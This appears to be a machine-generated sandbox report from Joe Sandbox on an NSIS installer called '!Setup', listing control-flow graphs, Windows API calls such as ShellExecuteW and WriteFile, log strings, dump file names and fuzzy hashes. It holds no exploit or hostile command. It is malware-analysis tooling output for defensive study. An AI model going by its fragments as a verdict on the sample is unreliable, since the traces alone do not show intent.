                                                                                control_flow_graph 846 402b23-402b37 GlobalAlloc 847 402b39-402b49 call 401446 846->847 848 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 846->848 853 402b70-402b73 847->853 848->853 854 402b93 853->854 855 402b75-402b8d call 405f96 WriteFile 853->855 857 4030e3-4030f2 854->857 855->854 861 402384-40238d GlobalFree 855->861 861->857
                                                                                APIs
                                                                                • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                • String ID:
                                                                                • API String ID: 2568930968-0
                                                                                • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 863 402713-40273b call 406035 * 2 868 402746-402749 863->868 869 40273d-402743 call 40145c 863->869 871 402755-402758 868->871 872 40274b-402752 call 40145c 868->872 869->868 875 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 871->875 876 40275a-402761 call 40145c 871->876 872->871 876->875
                                                                                APIs
                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfileStringWritelstrcpyn
                                                                                • String ID: %IsraeliSales%$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                • API String ID: 247603264-4002239702
                                                                                • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 884 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 895 402223-4030f2 call 4062cf 884->895 896 40220d-40221b call 4062cf 884->896 896->895
                                                                                APIs
                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,74DF23A0,00000000), ref: 00404FD6
                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FE6
                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FF9
                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                Strings
                                                                                • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                • API String ID: 3156913733-2180253247
                                                                                • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: CountFileNameTempTick
                                                                                • String ID: nsa
                                                                                • API String ID: 1716503409-2209301699
                                                                                • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                APIs
                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                • String ID: HideWindow
                                                                                • API String ID: 1249568736-780306582
                                                                                • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                APIs
                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                APIs
                                                                                • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: File$AttributesCreate
                                                                                • String ID:
                                                                                • API String ID: 415043291-0
                                                                                • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                APIs
                                                                                • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                APIs
                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                APIs
                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: Char$Next$CreateDirectoryPrev
                                                                                • String ID:
                                                                                • API String ID: 4115351271-0
                                                                                • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                APIs
                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
